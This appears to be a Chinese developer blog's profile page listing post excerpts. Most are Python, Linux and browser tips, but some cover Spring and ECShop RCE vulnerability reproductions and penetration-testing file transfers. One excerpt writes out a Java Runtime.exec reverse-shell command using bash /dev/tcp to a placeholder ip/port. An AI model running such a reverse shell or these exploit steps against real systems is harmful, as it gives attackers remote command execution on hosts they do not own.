14 whatday

尚未进行身份认证

我要认证

暂无相关简介

等级
TA的排名 109

python3 多维数组 NumPy ndarray 简介

目录基础重要属性创建Converting Python array_like Objects to NumPy Arrays多维数组一维通用数学函数基础NumPy 的主要对象是齐次多维数组。它是一个元素表(通常是元素是数字),其中所有元素类型都相同,元素以正整数元组索引。在 NumPy 维度(dimension)被称为轴(axis)。ps.有几个轴就是几维数组,符合平时生活中有 x, y 两个坐标轴就是二维空间,再加上 z 轴就是三维空间的概念例如三维空间空..

2020-07-06 11:16:52

python3 字符串 转 ascii码

在这里先解释一下ASCII,Unicode 和 UTF-8这三者的关系最早出现的是ASCII,一共包含128个字符(一个字节可以表示256种状态,但第一位所有默认为0,所以只有128种)。在接下来计算机的发展过程中,128种远远不能满足增加的需求(各种国家语言等),所以引入了Unicode,但Unicode只规定了符号的二进制代码,并没有规定存储方式。因此引入了UTF-8,UTF-8是一种 Unicode 的实现方式。对于英语字母,UTF-8编码和ASCII码是相同的。python3 字符串默...

2020-07-06 11:06:29

python3 字符串转数组 数组转字符串 切片操作

1.数组转字符串#方法1arr = ['a','b']str1 = ''.join(arr)#方法2arr = [1,2,3]#str = ''.join(str(i) for i in arr) #此处str命名与str函数冲突!str2 = ''.join(str(i) for i in arr)2.字符串转数组#方法一str_x = 'avfg'st_list = list(str_x) #使用list() #方法二list_str = []list_str

2020-07-06 11:04:11

spring-data-rest-rec 复现分析 cve-2017-8046

漏洞信息pivotal发布的漏洞信息如下:Malicious PATCH requests submitted to servers using Spring Data REST backed HTTP resources can use specially crafted JSON data to run arbitrary Java code.简而言之,就是Spring Data REST对PATCH方法处理不当,导致攻击者能够利用JSON数据造成RCE。本质还是因为spring的SPE

2020-07-06 10:53:56

linux 错误 ttyname failed: Inappropriate ioctl for device 解决方法

在我使用git push、hexo deploy等类似操作时,时常会看到ttyname failed: Inappropriate ioctl for device的报错信息。这怎么能行,不是0 errors,0 warnings能行?这里就来记录一下这个问题的解决办法。问题原因Ubuntu 知道并不是所有人都会对 root 账户执行图形登录,所以在默认.profile文件中设置了在这种情况下产生虚假错误。你可以看到,在/root/.profile文件末尾有这样一行。me...

2020-07-06 10:49:41

python3 获取 函数参数个数 和 默认参数

实例如下:def sum(a,b): return(a+b) print(sum.__code__.co_argcount)# 2#输出的函数参数个数print(sum.__code__.co_varnames)# ('a', 'b')#这里会输出函数用到的所有变量名,不只是参数名 print(sum.__defaults__)# None# 返回参数的初始值...

2020-07-06 10:48:00

python3 函数签名简介 验证函数参数

一个函数或方法,它使用*args和**kwargs作为参数,这样使得它比较通用, 但有时候你想检查传递进来的参数是不是某个你想要的类型。可以使用函数签名来做验证函数签名对象,表示调用函数的方式,即定义了函数的输入和输出。在Python中,可以使用标准库inspect的一些方法或类,来操作或创建函数签名。获取函数签名及参数使用标准库的signature方法,获取函数签名对象;通过函数签名的parameters属性,获取函数参数。# 注意是小写的signaturefrom inspect

2020-07-06 10:45:58

python3 乱序函数 shuffle 简介

解释说明:shuffle()函数是打乱序列里面的元素,并随机排列的。使用说明:import randomrandom.shuffle (alist )注意下:alist可以使是一个列表,也可以是个序列。shuffle()是不能直接访问的,需要导入random模块具体例子:import randomalist = [1,2,3,4,5]random.shuffle(alist)print(alist)看看输出结果:[3, 5, 4, 2, 1] #----&

2020-07-06 10:36:23

python3 生成随机数、随机字符串

import randomimport string# 随机整数:print(random.randint(1,50))# 输出结果:# 3# 随机选取0到100间的偶数:print(random.randrange(0, 101, 2))# 输出结果:# 68# 随机浮点数:print(random.random())print(random.uniform(1, 10))# 输出结果 :# 0.6416188153501455# 2.7048419170561.

2020-07-06 10:27:15

linux 查看 定时任务 crontab 日志记录

在Unix和类Unix的操作系统之中,crontab命令常用于设置周期性被执行的指令,也可以理解为设置定时任务。crontab中的定时任务有时候没有成功执行,什么原因呢?这时就需要去日志里去分析一下了,那该如何查看crontab的日志记录呢?1. linux看 /var/log/cron.log这个文件就可以,可以用 tail -f /var/log/cron.log 观察2. unix在 /var/spool/cron/tmp文件中,有croutXXX001864的tmp文件,tail

2020-07-03 17:05:47

java Runtime.getRuntime().exec 获取反弹shell

说明前面写了一篇在Java环境下获取shell的文章。当时使用的语句是: 123 Runtime r = Runtime.getRuntime();Process p = r.exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/ip/port;cat <&5 | while read line; do $line 2>&5 >&5; done"});p

2020-07-03 09:17:05

php file_put_contents() 与 file_get_contents() 函数用法

file_put_contentsfile_put_contents() 函数用于把字符串写入文件,成功返回写入到文件内数据的字节数,失败则返回 FALSE。语法:int file_put_contents ( string filename, string data [, int flags [, resource context]] )参数说明:参数说明filename要写入数据的文件名data要写入的数据。类型可以是 string,array(但不能为多维数组),或者是 stre...

2020-07-03 09:05:49

谷歌浏览器 chrome 查看当前页面cookie

方法一:首先,开启浏览器,输入要查看网址,再点网址列前方的图示,就可以就会看到Cookie。其次,点一下上图中显示的数字,进入后在允许的页面中,就会看到目前所储存的Cooke值有哪些。最后,当你要查看某个具体的cookie值,找到网址点一下,就可看到每个Cookie所记录的值与内容啦!方法二:键盘F12,找到network——点击Doc(如果没有数据,刷新一下界面),可以看到如下截图所示:有cookie等信息:...

2020-07-03 09:02:15

js base64编码解码 btoa atob 函数简介

window.atob(string):解码用来解码一个已经被base-64编码过的字符串。(参数string: 必需是一个通过 btoa() 方法编码的字符串)window.btoa(string):编码用来创建一个 base-64编码的字符串。示例://编码示例window.btoa('<script src="test.js"></script>'); 输出:"PHNjcmlwdCBzcmM9InRlc3QuanMiPjwvc2NyaXB0Pg=="/

2020-07-02 20:33:15

python3报错处理:UnicodeEncodeError: ‘ascii‘ codec can‘t encode characters in position 0-1

一、背景说明最开始不愿意使用Python,一大原因是因为Python2默认使用ASCII编码处理中文可以说是一件痛苦的事情。仅从更换默认编码一项变换,就可以说Python3和Python2不算同一门语言。Python3更换为默认使用Unicode(utf-8)编码,一直使用下来再没有遇到编码问题带来的困挠,似乎编码问题在Python3时代就该完全消失的。但这两天遇到了一个问题。在调用一个库时,出现了一个异常报错类似如UnicodeEncodeError: 'ascii' codec can't

2020-07-02 16:04:26

python时间差中 seconds 和 total_seconds 区别

import datetime t1 = datetime.datetime.strptime("2017-9-06 10:30:00", "%Y-%m-%d %H:%M:%S")t2 = datetime.datetime.strptime("2017-9-06 12:30:00", "%Y-%m-%d %H:%M:%S") interval_time = (t2 - t1).seconds # 输入的结果:7200 忽略微秒和天total_interval_time = (t2 - t1.

2020-07-02 15:18:16

java getRuntime().exec 带符号的命令 无法执行 解决方法

0x01 前言首先Java下的命令执行大家都知道常见的两种方式:1.使用ProcessBuilder 12 ProcessBuilder pb=new ProcessBuilder(cmd); pb.start(); 2.使用Runtime 1 Runtime.getRuntime().exec(cmd) 也就是说上面cmd参数可控的情况下,均存在命令执行的问题。但是话题回来,不太清楚大家是否

2020-07-02 13:31:36

渗透测试中的文件传输技巧

目录搭建 HTTP serverPythonPHP 5.4+RubyRuby 1.9.2+Perlbusybox httpdDownload files from HTTP serverWindowsLinuxSetup HTTP PUT server使用 Nginx 搭建 HTTP PUT Server使用 Python 搭建 HTTP PUT Server上传文件到 HTTP PUT serverLinuxWindows使用 Bash

2020-07-02 13:02:46

spring security oauth rce (cve-2016-4977) 漏洞分析

背景描述Spring Security OAuth 2016年以前有出一个CVE,这里写一个记录学习的东西。漏洞详细Spring Security OAuth官网有CVE-2016-4977的介绍,但是讲的不怎么清楚,就只是说了一下漏洞原理,我们就只知道是因为执行一个SpEL表达式https://pivotal.io/de/security/cve-2016-4977而产生的。看看利用的poc,大概了解一下整个过程。http://localhost:8080/oauth/authorize?resp

2020-07-02 12:35:02

ecshop 2.x/3.x sql注入/任意代码执行漏洞

影响版本:Ecshop 2.x Ecshop 3.x-3.6.0漏洞分析:该漏洞影响ECShop 2.x和3.x版本,是一个典型的“二次漏洞”,通过user.php文件中display()函数的模板变量可控,从而造成SQL注入漏洞,而后又通过SQL注入漏洞将恶意代码注入到危险函数eval中,从而实现了任意代码执行。值得一提的是攻击者利用的payload只适用于ECShop 2.x版本导致有部分安全分析者认为该漏洞不影响ECShop 3.x,这个是因为在3.x的版本里有引入防注...

2020-07-01 22:17:10

查看更多

勋章 我的勋章
  • 持之以恒
    持之以恒
    授予每个自然月内发布4篇或4篇以上原创或翻译IT博文的用户。不积跬步无以至千里,不积小流无以成江海,程序人生的精彩需要坚持不懈地积累!
  • 1024勋章
    1024勋章
    #1024程序员节#活动勋章,当日发布原创博客即可获得
  • 勤写标兵Lv4
    勤写标兵Lv4
    授予每个自然周发布9篇以上(包括9篇)原创IT博文的用户。本勋章将于次周周三上午根据用户上周的博文发布情况由系统自动颁发。
  • 原力新人
    原力新人
    在《原力计划【第二季】》打卡挑战活动中,成功参与本活动并发布一篇原创文章的博主,即可获得此勋章。
  • 分享王者
    分享王者
    成功上传51个资源即可获取